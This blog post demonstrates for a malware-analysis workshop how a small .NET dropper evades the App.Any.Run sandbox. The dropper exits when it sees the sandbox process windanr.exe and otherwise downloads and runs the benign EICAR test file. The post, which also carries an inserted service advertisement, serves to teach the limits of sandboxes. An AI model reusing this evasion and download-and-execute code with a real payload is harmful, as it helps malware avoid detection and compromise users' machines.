The goal of this research was to create a small dropper that could evade detection in the popular App.Any.Run sandbox solution, yet still determine if it was running in the sandbox or not. It is not 100% certain that this technique also works on the searcher and hunter versions of App.Any.Run, but it has been confirmed to work on the free version.
This research was conducted as part of a workshop on malware analysis for one of my clients, with the aim of demonstrating how easily tools like App.Any.Run and other sandbox solutions can be tricked. It is important to note that while sandboxes can be useful for initial analysis, they should not be relied upon as a replacement for human analysts. Even with features like “heavy anti-evasion”, these tools may not be able to detect more advanced malware. As a result, those tools should only be used as a supplement to human analysts.
The following code is a dropper written in .NET that drops the EICAR test file with enhanced functionality to evade detection by App.Any.Run’s sandbox. This attack also works with heavy anti-evasion enabled. It checks for the presence of a specific executable (qemu-ga.exe) that always runs in the current version of the sandbox. If this process is detected, the dropper quits, as killing the process would result in the termination of the connection to the guest operating system and also requires administrative access. Checking for the given process does not.
Detecting the attack is fairly simple. Most malware analysts would probably immediately check why the given application quits directly after the start and patch it out, however more junior analysts might get tricked by this.Looking for top-notch cybersecurity services? Look no further! Our team of experienced analysts uses the latest tools and techniques to protect your organization from all types of cyber threats. From malware analysis and incident response to penetration testing and risk assessment, we have you covered. Contact us today to learn more and get started with a free consultation.
Update: The process qemu-ga.exe changed to the static name q.exe. This is to unspecific to directly act on, therefore I changed the source to check for windanr.exe, another static artifact on App.Any.Run sandbox.
Old Sample URL: Initial Sample
New Sample URL: Updated Sample
using System; /// <summary> /// This code was created for a workshop to show how easy it can be /// to trick "next generation security" products. /// It should demonstrate that even a thing called ///"Heavy anti evasion" is not that heavy. /// In no way i would say the targeted sandbox is a bad project - /// i love it! But everyone needs to understand the limitations. /// /// This is not a tool that provides any illegal information. ///We do not promote hacking or software cracking. ///All the information provided on these pages is for educational purposes only. /// The authors of this tool are not responsible for any misuse of the information. ///You shall not misuse the information to gain unauthorized access and/or write malicious programs. /// This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. /// You may try all of these techniques on your own computer at your own risk. /// Performing any hack attempts/tests without written permission from the owner of the computer system is illegal. /// IN NO EVENT SHALL THE CREATORS, OWNER, OR CONTRIBUTORS BE LIABLE FOR ///ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL ///DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE ///GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS ///INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER ///IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR ///OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ////ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. /// </summary> namespace Heavy_anti_evasion_bypass { class Program { static void Main(string[] args) { foreach (var process in System.Diagnostics.Process.GetProcessesByName("windanr")) { Environment.Exit(1); } //sandbox check survived string remoteUri = "http://www.eicar.org/download/eicar.com"; string saveFileName = "eicar.com"; System.Net.WebClient myWebClient = new System.Net.WebClient(); myWebClient.DownloadFile(remoteUri, saveFileName); System.Diagnostics.Process.Start(saveFileName); } } }
Company Reviews